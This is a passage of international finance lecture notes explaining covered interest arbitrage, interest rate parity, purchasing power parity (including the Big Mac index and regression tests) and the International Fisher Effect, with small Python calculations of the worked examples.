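    jpy = usd_borrowed * jpy_usd     # sell USD for JPY
    gbp = jpy / jpy_gbp              # sell JPY for the (cheap) GBP
    usd = gbp * usd_gbp              # sell GBP back for USD
    return usd - usd_borrowed        # repay the USD loan

print(cross_rate)                                                    # 160.0
print(round(triangular_profit(s_jpy_usd, s_usd_gbp, s_jpy_gbp), 4))  # 0.1429
```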
Covered Interest Arbitrage (4 instruments: 2 goods per market and 2 markets)
Open the third section of the WSJ: Brazilian bonds yield 10% and Japanese bonds 1%.
Q: Why wouldn't capital flow to Brazil from Japan?
A: FX risk: Once JPY are exchanged for BRL (Brazilian reals), there is no guarantee that the BRL will not depreciate against the JPY.
=> The only way to avoid this FX risk is to be covered with a forward FX contract.
Intuition: Let’s suppose today, at t=0, we have the following data:
iJPY = 1% for 1 year (T=1 year)
iBRL = 10% for 1 year (T=1 year)
St = .025 BRL/JPY
Strategy to take “advantage” of the interest rate differential:
Today, at time t=0, we do the following:
(1) Borrow JPY 1000 at 1% for 1 year.
(At T=1 year, we will need to repay JPY 1010.)
(2) Convert to BRL at .025 BRL/JPY. Get BRL 25.
(3) Deposit BRL 25 at 10% for 1 year.
(At T=1 year, we will receive BRL 27.50.)
At time T=1 year, we do the final step:
(4) Exchange BRL 27.50 for JPY at ST=1-year
=> Profit = BRL 27.50/ST=1-year – JPY 1010

Problem with this strategy: It is risky => today, we do not know ST=1-year
Suppose at t=0, a bank offers Ft,1-year = .026 BRL/JPY.
Then, at time T=1 year, we do the final step:
(4) Exchange BRL 27.50 for JPY at .026 BRL/JPY.
=> We get JPY 1057.6923
=> Profit = JPY 1057.6923 – JPY 1010 = JPY 47.69
Now, instead of borrowing JPY 1000, we will try to borrow JPY 10 billion (and make a JPY 480M profit) or more.
Obviously, no bank will offer a .026 JPY/BRL forward contract!
=> Banks will offer Ft,1-year contracts that produce non-positive profits for arbitrageurs.
Q: How do banks price FX forward contracts?
A: In such a way that arbitrageurs cannot take advantage of their quotes.
To price a forward contract, banks consider covered arbitrage strategies.
Notation:
id = domestic nominal T days interest rate (annualized).
if = foreign nominal T days interest rate (annualized).
St = time t spot rate (direct quote, for example USD/GBP).
Ft,T = forward rate for delivery at date T, at time t.
Note: In developed markets (like the US), all interest rates are quoted on annualized basis.
Now, consider the following (covered) strategy:
1. At t=0, borrow 1 unit of FC from a foreign bank for T days.
   At time T, we repay the foreign bank (1 + if x T/360) units of the FC.
2. At t=0, exchange FC 1 for DC St.
3. Deposit DC St in a domestic bank for T days.
   At time T, we receive DC St (1 + id x T/360).
4. At t=0, buy a T-day forward contract to exchange DC for FC at Ft,T.
   At time T, we exchange the DC St (1 + id x T/360) for FC, using Ft,T.
   We get St (1 + id x T/360)/Ft,T units of foreign currency.
This strategy will not be profitable if, at time T, what we receive in FC is less than or equal to what we have to pay in FC. That is, arbitrage will force:

St (1 + id x T/360)/Ft,T = (1 + if x T/360).

Solving for Ft,T, we obtain the following expression:

Ft,T = St (1 + id x T/360)/(1 + if x T/360).

This equation represents the Interest Rate Parity Theorem or IRPT.
It is common to use the following linear IRPT approximation:
Ft,T ≈ St [1 + (id - if) x T/360].
This linear approximation is quite accurate for small differences in id - if.
Example: Using IRPT.
St = 106 JPY/USD.
id=JPY = .034.
if=USD = .050.
T = 1 year
=>Ft,1-year = 106 JPY/USD x (1+.034)/(1+.050) = 104.384 JPY/USD.
Using the linear approximation:
Ft,1-year ≈ 106 JPY/USD x (1 - .016) = 104.304 JPY/USD.
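Both the exact IRPT formula and its linear approximation are easy to verify numerically (a sketch; numbers from the JPY/USD example, function names are ours):

```python
# IRPT forward pricing: exact formula and linear approximation.
def irpt_forward(spot, i_d, i_f, days=360):
    """Exact IRPT: F = S (1 + i_d*T/360) / (1 + i_f*T/360)."""
    return spot * (1 + i_d * days / 360) / (1 + i_f * days / 360)

def irpt_forward_linear(spot, i_d, i_f, days=360):
    """Linear approximation: F ~ S [1 + (i_d - i_f)*T/360]."""
    return spot * (1 + (i_d - i_f) * days / 360)

print(round(irpt_forward(106, 0.034, 0.050), 2))         # 104.38 JPY/USD
print(round(irpt_forward_linear(106, 0.034, 0.050), 2))  # 104.3 JPY/USD
```

The two results differ only slightly here because id - if is small.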
Example: Violation of IRPT at work.
St = 106 JPY/USD.
id=JPY = .034.
if=USD = .050.
Ft,one-year-IRP = 106 JPY/USD x (1 - .016) = 104.304 JPY/USD.
Suppose Bank A offers: FAt,1-year= 100 JPY/USD.
FAt,1-year= 100 JPY/USD< Ft,1-year-IRP (a pricing mistake!)
The forward USD is undervalued against the JPY.
Take advantage of Bank A’s mispricing (the forward USD is undervalued): Buy USD forward.
Sketch of a covered arbitrage strategy:
(1) Borrow USD 1 from a U.S. bank for one year
(2) Exchange the USD for JPY
(3) Deposit the JPY in a Japanese bank.
(4) Buy USD forward (Sell forward JPY) at FAt,1-yr.
At T = 1 year, sell the JPY received from the Japanese bank at Ft,1-yr and repay the U.S. bank in USD.
After one year, the U.S. investor realizes a risk-free profit of USD .046 per USD borrowed.
Note: Arbitrage will ensure that Bank A’s quote quickly converges to Ft,1-yr-IRP = 104.3 JPY/USD. ¶
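The covered arbitrage profit against Bank A's quote can be verified with a short sketch (numbers from the example above; the function name is ours):

```python
# Covered arbitrage against a mispriced forward (JPY/USD example).
def covered_arb_profit_usd(spot_jpy_usd, f_jpy_usd, i_usd, i_jpy):
    """Profit per USD borrowed: USD -> JPY deposit -> sell JPY forward."""
    jpy_deposit = spot_jpy_usd * (1 + i_jpy)  # JPY received in 1 year
    usd_back = jpy_deposit / f_jpy_usd        # convert at the forward rate
    return usd_back - (1 + i_usd)             # repay the USD loan

profit = covered_arb_profit_usd(106, 100, 0.050, 0.034)
print(round(profit, 3))   # 0.046 (USD per USD borrowed)
```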
The Forward Premium and the IRPT
Reconsider the linearized IRPT. That is,

Ft,T ≈ St [1 + (id - if) x T/360].

A little algebra gives us:

(Ft,T - St)/St x 360/T ≈ (id - if)

Let T = 360, and call p = (Ft,T - St)/St the forward premium. Then,

p ≈ id - if.

Note: p measures the annualized % gain/loss of buying FC spot and selling it forward. The opportunity cost of doing this is given by id - if.

Equilibrium: p exactly compensates (id - if)
→ No arbitrage opportunities → No capital flows.
Under the linear approximation, we have the IRP Line
[Figure: the IRP Line is a 45º line in the plane with the forward premium p on the horizontal axis and (id - if) on the vertical axis. Point B, above the line, is associated with capital inflows; point A, below the line, with capital outflows.]
Look at point A: p > id – if (or p + if > id)
=> Domestic capital flies to the foreign country (what an investor loses on the lower interest rate, if, is more than compensated by the high forward premium, p).
IRPT with Bid-Ask Spreads
Exchange rates and interest rates are quoted with bid-ask spreads.
Consider a trader in the interbank market:
She will have to buy or borrow at the other party's ask price.
She will sell or lend at the bid price.
There are two roads to take for arbitrageurs:
(1) borrow domestic currency
(2) borrow foreign currency.
• Bid’s Bound: Borrow Domestic Currency
(1) A trader borrows DC 1 at time t=0, and repays 1+iask,d at time=T.
(2) Using the borrowed DC 1, she can buy spot FC at (1/Sask,t).
(3) She deposits the FC at the foreign interest rate, ibid,f.
(4) She sells the FC forward for T days at Fbid,t,T
This strategy would yield, in terms of DC:

(1/Sask,t) (1 + ibid,f) Fbid,t,T.

In equilibrium, this strategy should yield no profit. That is,

(1/Sask,t) (1 + ibid,f) Fbid,t,T ≤ (1 + iask,d).

Solving for Fbid,t,T,

Fbid,t,T ≤ Sask,t [(1 + iask,d)/(1 + ibid,f)] = Ubid.
• Ask’s Bound: Borrow Foreign Currency
(1) The trader borrows FC 1 at time t=0, and repay 1+iask,f.
(2) Using the borrowed FC 1, she can buy spot DC at Sask,t.
(3) She deposits the DC at the domestic interest rate, ibid,d.
(4) She buys the FC forward for T days at Fask,t,T
Following a similar procedure as the one detailed above, we get:
Fask,t,T ≥ Sbid,t [(1 + ibid,d)/(1 + iask,f)] = Lask.
Example: IRPT bounds at work.
Data: St = 1.6540-1.6620 USD/GBP
iUSD = 7¼-½,
iGBP = 8 1/8–3/8,
Ft,one-year= 1.6400-1.6450 USD/GBP.
Check if there is an arbitrage opportunity (we need to check the bid’s bound and ask’s bound).
i) Bid’s bound covered arbitrage strategy:
1) Borrow USD 1 at 7.50% for 1 year
=> Repay USD 1.07500 in 1 year.
2) Convert to GBP & get GBP 1/1.6620 = GBP 0.6017
3) Deposit GBP 0.6017 at 8.125%
4) Sell GBP forward at 1.64 USD/GBP
=> we get (1/1.6620) x (1 + .08125)x1.64 = USD 1.06694
=> No arbitrage: For each USD borrowed, we lose USD .00806.
ii) Ask’s bound covered arbitrage strategy:
1) Borrow GBP 1 at 8.375% for 1 year => we will repay GBP 1.08375.
2) Convert to USD & get USD 1.6540
3) Deposit USD 1.6540 at 7.250%
4) Buy GBP forward at 1.645 USD/GBP
=> we get 1.6540x(1 + .07250)x(1/1.6450) = GBP 1.07837
=> No arbitrage: For each GBP borrowed, we lose GBP 0.0054.
Note: The bid-ask forward quote is consistent with no arbitrage. That is, the forward quote is within the IRPT bounds. Check:

Ubid = Sask,t [(1+iask,d)/(1+ibid,f)] = 1.6620 x [1.0750/1.08125]
= 1.6524 USD/GBP ≥ Fbid,t,T = 1.6400 USD/GBP.

Lask = Sbid,t [(1+ibid,d)/(1+iask,f)] = 1.6540 x [1.0725/1.08375]
= 1.6368 USD/GBP ≤ Fask,t,T = 1.6450 USD/GBP. ¶
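The two bounds can be computed directly (a sketch using the example's bid-ask quotes; the helper function is ours):

```python
# IRPT no-arbitrage bounds with bid-ask spreads (USD/GBP example, T = 1 year).
def irpt_bounds(s_bid, s_ask, id_bid, id_ask, if_bid, if_ask):
    """Return (L_ask, U_bid): a forward quote inside these bounds
    admits no covered arbitrage."""
    u_bid = s_ask * (1 + id_ask) / (1 + if_bid)   # upper bound for F_bid
    l_ask = s_bid * (1 + id_bid) / (1 + if_ask)   # lower bound for F_ask
    return l_ask, u_bid

l_ask, u_bid = irpt_bounds(1.6540, 1.6620, 0.0725, 0.0750, 0.08125, 0.08375)
print(round(l_ask, 4), round(u_bid, 4))   # 1.6368 1.6524

# The quoted forward 1.6400-1.6450 lies inside the bounds: no arbitrage.
f_bid, f_ask = 1.6400, 1.6450
print(f_bid <= u_bid and f_ask >= l_ask)  # True
```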
A trader is not able to find a specific forward currency contract.
This trader might be able to replicate the forward contract using a spot currency contract combined with borrowing and lending.
This replication is done using the IRP equation.
Example: Replicating a USD/GBP 10-year forward contract.
iUSD,10-yr = 6%
iGBP,10-yr = 8%
St = 1.60 USD/GBP
T = 10 years.
Ignoring transactions costs, she creates a 10-year (implicit) forward quote with the following transactions:
1) Borrow USD 1 at 6% for 10 years
2) Convert to GBP at 1.60 USD/GBP (get GBP 0.625)
3) Invest the GBP at 8% for 10 years
Cash flows in 10 years:
(1) Trader will receive GBP 1.34933 (= 0.625 x 1.08^10)
(2) Trader will have to repay USD 1.79085 (= 1.06^10)
We have created an implicit forward quote:
USD 1.79085/ GBP 1.34933 = 1.3272 USD/GBP. ¶
Or, directly from the IRPT:

Ft,10-year = St [(1 + id,10-year)/(1 + if,10-year)]^10
= 1.60 USD/GBP x [1.06/1.08]^10 = 1.3272 USD/GBP. ¶
Synthetic forward contracts are very useful for exotic currencies.
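A sketch of the synthetic forward calculation (annual compounding, as in the example; the function name is ours):

```python
# Synthetic long-dated forward via IRP (10-year USD/GBP example).
def synthetic_forward(spot, i_d, i_f, years):
    """Implicit forward from spot + borrowing/lending:
    F = S [(1 + i_d)/(1 + i_f)]^T, with annual compounding."""
    return spot * ((1 + i_d) / (1 + i_f)) ** years

print(round(synthetic_forward(1.60, 0.06, 0.08, 10), 4))  # 1.3272 USD/GBP
```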
Factors (and associated models) behind St movements:
- Inflation rate differentials (IUSD - IFC) → PPP
- Interest rate differentials (iUSD - iFC) → IFE
- Income growth rates (yUSD - yFC) → Monetary Approach
- Trade flows → Balance of Trade
- Other: trade barriers, expectations, taxes, etc.
• The usual monthly percentage change in St (JPY/USD) –i.e., the mean– is roughly -0.9%, an appreciation of the JPY against the USD (annualized: a -11.31% change). The SD is 4.61%.
• These numbers are the ones to match with our theories for St. A good theory should predict an annualized change close to -11% for st.
Purchasing Power Parity (PPP)
PPP is based on the law of one price (LOP): Goods once denominated in the same currency should have the same price. If they are not, then arbitrage is possible.
Example: LOP for Oil.
Poil-USA = USD 80.
Poil-SWIT = CHF 160.
StLOP = USD 80 / CHF 160 = 0.50 USD/CHF.
If St = 0.75 USD/CHF, then a barrel of oil in Switzerland is more expensive -once denominated in USD- than in the US:
Poil-SWIT (USD) = CHF 160 x 0.75 USD/CHF = USD 120 > Poil-USA
Traders will buy oil in the US (and export it to Switzerland) and sell the US oil in Switzerland.
This movement of oil will increase the price of oil in the U.S. and also will appreciate the USD against the CHF. ¶
Note I: LOP gives an equilibrium exchange rate. Equilibrium will be reached when there is no trade in oil (because of pricing mistakes). That is, when the LOP holds for oil.

Note II: LOP is telling us what St should be (in equilibrium). It is not telling us what St is in the market today.

Note III: Using the LOP we have generated a model for St. We'll call this model, when applied to many goods, the PPP model.
Problem with the LOP: there are many goods (and many prices). Solution: Use baskets of goods.
PPP: The price of a basket of goods should be the same across countries, once denominated in the same currency. That is, USD 1 should buy the same amounts of goods here (in the U.S.) or in Colombia.
Absolute version of PPP: The FX rate between two currencies is simply the ratio of the two countries' general price levels:
StPPP = Domestic Price level / Foreign Price level = Pd / Pf
Example: Law of one price for CPIs.
CPI-basketUSA = PUSA = USD 755.3
CPI-basketSWIT = PSWIT = CHF 1241.2
StPPP= USD 755.3/CHF 1241.2 = 0.6085 USD/CHF.
If St 0.6085 USD/CHF, there will be trade of the goods in the basket between Switzerland and US.
StPPP= USD 755.3/CHF 1241.2 = 0.6085 USD/CHF.
Suppose St = 0.70 USD/CHF > StPPP.
Then, PSWIT (in USD) = CHF 1241.2 x 0.70 USD/CHF
= USD 868.84 > PUSA = USD 755.3
Potential profit: USD 868.84 – USD 755.3 = USD 113.54
Traders will do the following pseudo-arbitrage strategy:
1) Borrow USD
2) Buy the CPI-basket in the US
3) Sell the CPI-basket, purchased in the US, in Switzerland.
4) Sell the CHF/Buy USD
5) Repay the USD loan, keep the profits. ¶
Note: “Equilibrium forces” at work: 2) PUSA ↑; 3) PSWIT ↓ (& StPPP ↑); 4) St ↓. ¶
The absolute version of the PPP theory is expressed in terms of St, the nominal exchange rate.
We can modify the absolute version of the PPP relationship in terms of the real exchange rate, Rt. That is,
Rt= St Pf / Pd.
Rt allows us to compare prices, translated to DC:
If Rt> 1, foreign prices (translated to DC) are more expensive
If Rt = 1, prices are equal in both countries –i.e., PPP holds!
If Rt < 1, foreign prices are cheaper
Economists associate Rt > 1 with a more efficient domestic economy.
Example: The Big Mac standard.
Pf = PSWIT = CHF 6.23
Pd = PUS = USD 3.58
St = 1.012 USD/CHF.
Rt= St PSWIT / PUS =1.012USD/CHF x CHF 6.23/USD 3.58 = 1.7611.
Taking the Big Mac as our basket, the U.S. is more competitive than Switzerland. Swiss prices are 76.11% higher than U.S. prices, after taking into account the nominal exchange rate.
To bring the economy to equilibrium –no trade in Big Macs-, we expect the USD to appreciate against the CHF.
According to PPP, the USD is undervalued against the CHF.
=> Trading signal: Buy USD/Sell CHF. ¶
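The Big Mac computations above can be reproduced with a short sketch (prices and spot from the example; the helper names are ours):

```python
# Real exchange rate R_t = S_t * P_f / P_d, and the absolute-PPP spot rate.
def real_exchange_rate(spot_dc_fc, p_foreign_fc, p_domestic_dc):
    return spot_dc_fc * p_foreign_fc / p_domestic_dc

def ppp_spot(p_domestic_dc, p_foreign_fc):
    """Absolute-PPP exchange rate: S^PPP = P_d / P_f (DC/FC)."""
    return p_domestic_dc / p_foreign_fc

r_t = real_exchange_rate(1.012, 6.23, 3.58)   # CHF Big Mac vs. USD Big Mac
print(round(r_t, 4))                  # 1.7611 -> CHF looks overvalued
print(round(ppp_spot(3.58, 6.23), 4)) # 0.5746 USD/CHF implied by PPP
```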
Why the Big Mac? 1) It is a standardized, common basket: beef, cheese, onion, lettuce, bread, pickles and special sauce. It is sold in over 120 countries.
2) It is very easy to find out the price.
3) It turns out, it is correlated with more complicated common baskets, like the PWT (Penn World Tables) based baskets.
Using the CPI basket may not work well for absolute PPP. The CPI baskets can be substantially different. In theory, traders can exploit the price differentials in BMs.
• This is not realistic. But, the components of a BM are internationally traded. The LOP suggests that prices of the components should be the same in all markets.
Example: (The Economist’s) Big Mac Index.
StPPP = PBigMac,d / PBigMac,f
The Economist reports the real exchange rate: Rt = St PBigMac,f / PBigMac,d.
For example, for Norway’s crown (NOK): Rt = 7.02/3.58 = 1.9609 => (96.09% overvaluation)
• Empirical Evidence: Simple informal test:
Test: If Absolute PPP holds => Rt= 1.
In the Big Mac example, PPP does not hold for the majority of countries.
Several tests of the absolute version have been performed: Absolute version of PPP, in general, fails (especially, in the short run).
• Absolute PPP: Qualifications
(1) PPP emphasizes only trade and price levels. Political/social factors (instability, wars), financial problems (debt crisis), etc. are ignored.
(2) Implicit assumption: Absence of trade frictions (tariffs, quotas, transactions costs, taxes, etc.).
Q: Realistic? On average, transportation costs add 7% to the price of U.S. imports of meat and 16% to the import price of vegetables. Many products are heavily protected, even in the U.S. For example, peanut imports are subject to a tariff as high as 163.8%. Also, in the U.S., tobacco usage and excise taxes add USD 5.85 per pack.
• Absolute PPP: Qualifications
Some everyday goods protected in the U.S.:
- European Roquefort Cheese, cured ham, mineral water (100%)
- Paper Clips (as high as 126.94%)
- Canned Tuna (as high as 35%)
- Synthetic fabrics (32%)
- Sneakers (48% on certain sneakers)
- Japanese leather (40%)
- Peanuts (shelled 131.8%, and unshelled 163.8%).
- Brooms (quotas and/or tariff of up to 32%)
- Chinese tires (35%)
- Trucks (25%) & cars (2.5%)
Some Japanese protected goods:
- Rice (778%)
- Beef (38.5%, but can jump to 50% depending on volume).
- Sugar (328%)
- Powdered Milk (218%)
• Absolute PPP: Qualifications
(3) PPP is unlikely to hold if Pf and Pd represent different baskets. This is why the Big Mac is a popular choice.
(4) Trade takes time (contracts, information problems, etc.)
(5) Internationally non-traded (NT) goods –i.e. haircuts, home and car repairs, hotels, restaurants, medical services, real estate. The NT good sector is big: 50%-60% of GDP (big weight in CPI basket).
Then, in countries where NT goods prices are relatively high, the CPI basket will also be relatively expensive. Thus, PPP will find these countries' currencies overvalued relative to currencies in low NT cost countries.
Note: In the short-run, we will not take our cars to Mexico to be repaired, but in the long-run, resources (capital, labor) will move. We can think of the over-/under-valuation as an indicator of movement of resources.
• Absolute PPP: Qualifications
The NT sector also has an effect on the price of traded goods. For example, rent and utilities costs affect the price of a Big Mac. (25% of Big Mac due to NT goods.)
• Empirical Fact
Price levels in richer countries are consistently higher than in poorer ones. This fact is called the Penn effect. Many explanations, the most popular: The Balassa-Samuelson (BS) effect.
• Balassa-Samuelson effect.
Labor costs affect all prices. We expect average prices to be cheaper in poor countries than in rich ones because labor costs are lower.
This is the so-called Balassa-Samuelson effect: Rich countries have higher productivity and, thus, higher wages in the traded-goods sector than poor countries do. But, firms compete for workers. Then wages in NT goods and services are also higher =>Overall prices are lower in poor countries.
• For example, in 2000, a typical McDonald’s worker in the U.S. made USD 6.50/hour, while in China made USD 0.42/hour.
• The Balassa-Samuelson effect implies a positive correlation between PPP exchange rates (overvaluation) and high productivity countries.
• Incorporating the Balassa-Samuelson effect into PPP:
1) Estimate a regression: Big Mac Prices against GDP per capita.
• Incorporating the Balassa-Samuelson effect into PPP:
2) Compute fitted Big Mac Prices (GDP-adjusted Big Mac Prices), along the regression line. Use the difference between GDP-adjusted Big Mac Prices and actual prices to estimate PPP over/under-valuation.
The rate of change in the prices of products should be similar when measured in a common currency (as long as trade frictions are unchanged):

sTPPP = (St+T/St) - 1 = (1 + Id)/(1 + If) - 1 (Relative PPP)

where,
If = foreign inflation rate from t to t+T;
Id = domestic inflation rate from t to t+T.

Linear approximation: sTPPP ≈ Id - If --a one-to-one relation.
Example: Prices double in Mexico relative to those in Switzerland. Then, SMXN/CHF,t doubles (say, from 9 MXN/CHF to 18 MXN/CHF). ¶
It’s 2011. You have the following information:
CPIUS,2011 = 104.5,
CPISA,2011 = 100.0,
S2011 =.2035 USD/ZAR.
You are given the 2012 CPI’s forecast for the U.S. and SA:
E[CPIUS,2012] = 110.8
E[CPISA,2012] = 102.5.
You want to forecast S2012 using the relative (linearized) version of PPP.
E[IUS-2012] = (110.8/104.5) - 1 = .06029
E[ISA-2012] = (102.5/100) - 1 = .025
E[S2012] = S2011 x (1 + E[IUS]- E[ISA])
= .2035 USD/ZAR x (1 + .06029 - .025) = .2107 USD/ZAR.
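The forecast can be reproduced with a short sketch (CPI numbers from the example; linearized relative PPP; the function name is ours):

```python
# Relative-PPP forecast of S_t (USD/ZAR example, linearized version).
def ppp_forecast(spot, cpi_d_new, cpi_d_old, cpi_f_new, cpi_f_old):
    inf_d = cpi_d_new / cpi_d_old - 1   # expected domestic inflation
    inf_f = cpi_f_new / cpi_f_old - 1   # expected foreign inflation
    return spot * (1 + inf_d - inf_f)   # E[S] = S (1 + I_d - I_f)

e_s_2012 = ppp_forecast(0.2035, 110.8, 104.5, 102.5, 100.0)
print(round(e_s_2012, 4))   # 0.2107 USD/ZAR
```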
Under the linear approximation, we have the PPP Line:

[Figure: the PPP Line is a 45º line in the plane with sT (DC/FC) on the horizontal axis and (Id - If) on the vertical axis. Point B, above the line, implies the FC appreciates; point A, below the line, implies the FC depreciates.]
Look at point A: sT > Id - If,
=> Priced in FC, the domestic basket is cheaper
=> pseudo-arbitrage against foreign basket => FC depreciates
Relative PPP: Implications
(1) Under relative PPP, Rt remains constant.
(2) Relative PPP does not imply that St is easy to forecast.
(3) Without relative price changes, an MNC faces no real operating FX risk (as long as the firm avoids fixed contracts denominated in FC).
Relative PPP: Testing
Under Relative PPP: sT ≈ Id – If

1. Visual Evidence
Plot (IJPY - IUSD) against st (JPY/USD), using monthly data 1970-2010, and check whether the points line up along a 45° line. (They do not: no 45° line emerges.)
More formal tests: Regression
st = (St+T - St)/St = α + β (Id - If)t + εt, where εt is the regression error, E[εt] = 0.
The null hypothesis is: H0 (Relative PPP true): α=0 and β=1
H1 (Relative PPP not true): α≠0 and/or β≠1
(1) t-test = [Estimated coeff. – Value of coeff. under H0]/S.E.(coeff.) t-test~ tv (v=N-K=degrees of freedom)
(2) F-test = {[RSS(H0)-RSS(H1)]/J}/{RSS(H1)/(N-K)}
F-test ~ FJ,N-K (J= # of restrictions in H0, K= # parameters in model, N= # of observations, RSS= Residuals Sum of Squared).
Example: JPY/USD monthly data. Regression results:

st (JPY/USD) = (St - St-1)/St-1 = α + β (IJAP – IUS)t + εt.

R2 = 0.00525
Standard Error (σ) = .0326
F-stat (slopes = 0 –i.e., β = 0) = 2.3054 (p-value = 0.130)
F-test (H0: α = 0 and β = 1) = 16.289 (p-value < 0.0001) => reject H0 at the 5% level (F2,437,.05 ≈ 3.015)
Observations = 439

                  Coefficient   Stand Err   t-Stat     P-value
Intercept (α)     -0.00246      0.001587    -1.55214   0.121352
(IJAP – IUS) (β)  -0.36421      0.239873    -1.51835   0.129648

We test H0 (Relative PPP true): α = 0 and β = 1, using t-tests (t437,.05 = 1.96; Note: when N-K > 30, t.05 ≈ 1.96):

tα=0: (-0.00246 – 0)/0.001587 = -1.55214 (p-value = .12) => cannot reject α = 0.
tβ=1: (-0.36421 – 1)/0.239873 = -5.6872 (p-value: .00001) => reject β = 1.

Both the tβ=1 t-test and the joint F-test reject H0: Relative PPP does not hold for the JPY/USD in this sample. ¶
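The mechanics of the OLS estimates and the t-test of H0: β = 1 can be sketched with NumPy. The data below are simulated for illustration only; the coefficients in the table above came from actual JPY/USD data:

```python
import numpy as np

# OLS of s_t on an inflation differential, then a t-test of H0: beta = 1.
rng = np.random.default_rng(0)
n = 439
inf_diff = rng.normal(0.0, 0.01, n)                     # simulated (I_d - I_f)
s_t = 0.0 + 0.2 * inf_diff + rng.normal(0.0, 0.03, n)   # simulated FX changes

X = np.column_stack([np.ones(n), inf_diff])     # design: [intercept, slope]
coef, *_ = np.linalg.lstsq(X, s_t, rcond=None)  # OLS estimates
resid = s_t - X @ coef
s2 = resid @ resid / (n - 2)                    # residual variance
se = np.sqrt(s2 * np.linalg.inv(X.T @ X).diagonal())

t_beta_eq_1 = (coef[1] - 1.0) / se[1]           # t-stat for H0: beta = 1
print(coef, se, t_beta_eq_1)
# With a true beta of 0.2 and a small SE, H0: beta = 1 is rejected
# (|t| > 1.96) -- the same qualitative conclusion as the regression above.
```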
- Short- run: PPP is a poor model to explain short-term St movements.
- Long-run: Evidence of mean reversion for Rt.
Currencies that consistently have high inflation rate differentials –i.e., (Id-If) positive-- tend to depreciate.
• Let’s look at the MXN/USD case.
We want to calculate StPPP= Pd,t / Pf,t over time.
(1) Divide StPPP by SoPPP (t=0 is our starting point).
(2) After some algebra,
StPPP = SoPPP x [Pd,t / Pd,o] x [Pf,o/Pf,t]
By assuming SoPPP = So, we plot StPPP over time.
(Note: SoPPP = So assumes that at t=0, the economy was in equilibrium. This may not be true: Be careful when selecting a base year.)
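The recursion StPPP = SoPPP x [Pd,t/Pd,o] x [Pf,o/Pf,t] is straightforward to compute from two price-index series. A minimal sketch, assuming SoPPP = So (the function name and the CPI values below are made up for illustration):

```python
def s_ppp_series(s0, p_d, p_f):
    """St^PPP = S0^PPP * (Pd,t / Pd,0) * (Pf,0 / Pf,t), assuming S0^PPP = S0."""
    return [s0 * (pd / p_d[0]) * (p_f[0] / pf) for pd, pf in zip(p_d, p_f)]

# Hypothetical CPI levels: domestic (Mexico) inflating faster than foreign (U.S.)
p_mex = [100, 120, 150]   # Pd
p_us = [100, 103, 106]    # Pf

print([round(x, 2) for x in s_ppp_series(10.0, p_mex, p_us)])  # [10.0, 11.65, 14.15]
```

With the higher domestic inflation, StPPP rises over time –i.e., PPP predicts a depreciating MXN, which matches the long-run evidence.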
- In the short-run, StPPP is missing the target, St.
- But, in the long-run, StPPP gets the trend right. (As predicted by PPP, the high Mexican inflation rates differentials against the U.S., depreciate the MXN against the USD.)
As predicted by PPP, since the inflation rates in the U.S. have been consistently higher than in Japan, in the long-run, the USD depreciates against the JPY.
- Equilibrium (“correct”) exchange rates. A CB can use StPPP to determine intervention bands.
- Explanation of St movements(“currencies with high inflation rate differentials tend to depreciate”).
- Indicator of competitiveness or under/over-valuation: Rt > 1 => FC is overvalued (& Foreign prices are not competitive).
- International GDP comparisons: Instead of using St, StPPP is used. For example, per capita GDP (in 2012):
Using market prices (St, actual exchange rates):
U.S. GDP: USD 15.06 trillion, a 23.1% of the world’s GDP (27.5% in ’96).
China’s GDP: USD 6.99 trillion, a 9.3% of the world’s GDP (3.1% in ’96).
Under PPP exchange rates –i.e., StPPP:
U.S. GDP: USD 15.06 trillion (the same) for a 20.0% share.
China’s GDP: USD 11.3 trillion, for a 14.4% share.
rd (f) = (1 + if x T/360)(1 + sT) - 1.
rd (d) = id x T/360.
Setting rd (f) = rd (d) and solving for sT:
sIFET = [1 + id x T/360]/[1 + if x T/360] - 1.  (This is the IFE)
Example: Forecasting St using IFE.
It’s 2011:I. You have the following information:
S2011:I=1.0659 USD/EUR.
iUSD,2011:I=6.5%
iEUR,2011:I=5.0%.
T = 1 quarter = 90 days.
eIFEf,2011:II = [1 + iUSD,2011:I x (T/360)]/[1 + iEUR,2011:I x (T/360)] - 1 =
= [1 + .065 x (90/360)]/[1 + .05 x (90/360)] – 1 = 0.003704
E[S2011:II] = S2011:I x (1 + eIFEf,2011:II) = 1.0659 USD/EUR x (1 + .003704)
= 1.06985 USD/EUR
That is, next quarter, you expect St to increase to 1.06985 USD/EUR to compensate for the higher US interest rates. ¶
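The forecast above is a two-line computation; a sketch replicating the example's numbers (the function name is ours):

```python
def ife_forecast(s_t, i_d, i_f, days=90):
    """IFE forecast: s^IFE = (1 + i_d*T/360)/(1 + i_f*T/360) - 1,
    and E[S_{t+T}] = S_t * (1 + s^IFE)."""
    s_ife = (1 + i_d * days / 360) / (1 + i_f * days / 360) - 1
    return s_ife, s_t * (1 + s_ife)

s_ife, e_s = ife_forecast(1.0659, 0.065, 0.05, days=90)
print(round(s_ife, 6))  # 0.003704
print(round(e_s, 5))    # 1.06985
```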
exchange rate. Equilibrium will be reached when there are no capital flows from one country to another to take advantage of interest rate differentials.
IFE: Implications
If IFE holds, the expected cost of borrowing funds is identical across currencies. Also, the expected return of lending is identical across currencies.
Carry trades –i.e., borrowing a low interest currency to invest in a high interest currency– should not be profitable.
If departures from IFE are consistent, investors can profit from them.
Annual interest rate differentials (iMEX - iUSD) were between 7% and 16%.
E[st] = -5% > sIFEt => Pseudo-arbitrage is possible (the MXN at t+T is overvalued relative to IFE!)
Carry Trade Strategy:
1) Borrow USD funds (at iUSD)
2) Convert to MXN at St
3) Invest in Mexican funds (at iMEX)
4) Wait until T. Then, convert back to USD at St+T.
Expected foreign exchange loss: 5% (E[st] = -5%)
Assume (iUSD – iMXN) = -7%. (Say, iUSD = 5%, iMXN = 12%.)
E[st] = -5% > sIFEt = -7% => "on average," strategy (1)-(4) should work.
Expected return (MXN investment):
rd (f) = (1 + iMXN x T/360)(1 + sT) - 1 = (1.12) x (1 - .05) - 1 = 0.064
Payment for USD borrowing:
rd (d) = id x T/360 = .05
Expected Profit = .014 per year
Note: Fidelity used this uncovered strategy during the early 90s. In Dec. 94, after the Tequila devaluation of the MXN against the USD, it lost everything it had gained before. Not surprising: after all, the strategy is a "pseudo-arbitrage" strategy! ¶
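The expected return of steps (1)-(4) can be sketched in a few lines, using the example's numbers (the helper name is ours):

```python
def carry_trade_expected_profit(i_borrow, i_invest, expected_s):
    """Borrow at i_borrow, invest abroad at i_invest, convert back after an
    expected FC change of expected_s (all rates per holding period)."""
    r_foreign = (1 + i_invest) * (1 + expected_s) - 1   # rd(f)
    return r_foreign - i_borrow                         # minus rd(d)

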